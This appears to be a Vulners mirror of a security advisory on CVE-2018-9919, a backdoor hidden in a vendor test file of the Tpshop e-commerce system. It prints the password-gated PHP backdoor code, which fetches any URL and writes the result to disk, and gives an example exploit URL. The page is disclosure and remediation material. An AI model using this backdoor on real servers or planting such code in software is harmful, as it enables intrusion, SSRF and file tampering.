Vulners
Lucene search
Tpshop 2.0.8 Arbitrary File Download / SSRF
🗓️ 02 May 2018 00:00:00Reported by Jiawang ZhangType 
packetstorm🔗 packetstormsecurity.com👁 183 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Tpshop 2.0.8 Arbitrary File Download / SSRF Vulnerability | 2 May 201800:00 | – | zdt |
 | TPshop web backdoor vulnerability | 3 May 201800:00 | – | cnvd |
 | CVE-2018-9919 | 2 May 201821:00 | – | cve |
 | CVE-2018-9919 | 2 May 201821:00 | – | cvelist |
 | EUVD-2018-21511 | 7 Oct 202500:30 | – | euvd |
 | CVE-2018-9919 | 2 May 201821:29 | – | nvd |
 | Command injection | 2 May 201821:29 | – | prion |
 | Backdoor in Tpshop <= 2.0.8 (CVE-2018-9919) | 2 May 201800:00 | – | seebug |
`# Backdoor in Tpshop <= 2.0.8 (CVE-2018-9919)
The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen Leopard Network Co., Ltd.This system is based on the Thinkphp development framework.
## Product Download: http://www.tp-shop.cn/Index/Index/download.html
## Vulnerability TypePSoWeb Backdoor
## Attack Type : Web Backdoor
## Vulnerability Description
Tpshop has a backdoor code in the '/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php' that can be used to download files to the other server and can also initiate attacks through SSRF vulnerabilities.
The vulnerability code:
/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 499):
$path = $_REQUEST['bddlj'];
$fileUrl =$_REQUEST['down_url'];
if(md5(md5($_REQUEST['jmmy'])) !== 'caae8ca617372b67363bd284e98430f2')
return false;
$path = strtolower($path);
if(strstr($path,'php')) return false;
$ch = curl_init($fileUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_BINARYTRANSFER,1);
$file = curl_exec ($ch);
curl_close ($ch);
$fp = fopen($path,'w');
fwrite($fp, $file);
fclose($fp);
## Exploit
The attacker can exploit this vulnerability to attack the server and increase its privileges,Example: download arbitrary filesPS!scan network portPS!information detection,attack internal network vulnerable!-s server.
http://target//vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php?bddlj=save_filename&down_url=download_url&jmmy=decryptpass
## Versions
Tpshop <= 2.0.8
## Impact
Web Backdoor in Tp-shop 2.0.5-2.0.8 version allow remote attackers to download arbitrary filesPS!scan network portPS!information detection,attack internal network vulnerable!-s serverPS!may even cause a remote command execution via the url parameter!PS
## Repairs
Delete Web Backdoor code. (/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 499))
## Credit
This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9919
Best wishes!
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 May 2018 00:00Current
9.7High risk
Vulners AI Score9.7
EPSS0.04704